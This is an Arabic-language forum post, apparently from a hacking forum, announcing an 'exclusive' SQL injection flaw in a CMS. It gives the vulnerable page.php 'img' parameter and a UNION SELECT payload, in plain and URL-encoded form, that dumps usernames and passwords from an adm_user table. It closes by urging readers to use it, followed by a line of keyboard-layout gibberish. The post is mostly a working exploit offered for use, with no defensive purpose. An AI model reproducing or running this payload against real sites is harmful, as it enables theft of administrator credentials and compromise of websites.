السلام عليكم ...
اليوم بعثلي فولكانو ثغرة جديدة وحصرية :
الملف المصاب :
كود:
http://server/cms/page.php?p=1&img=[N.A.S.T ]
الاستغلال :
كود:
http://server/cms/page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user
مثال :
كود:
http://server/cms/page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user
تحية لفولكانو على الشغل الجامد ... يله يا شباب ورونا همتكم ...
Adiooooos
eyvm []d]m lk tvk t,g;hk, fjhvdo hgd,l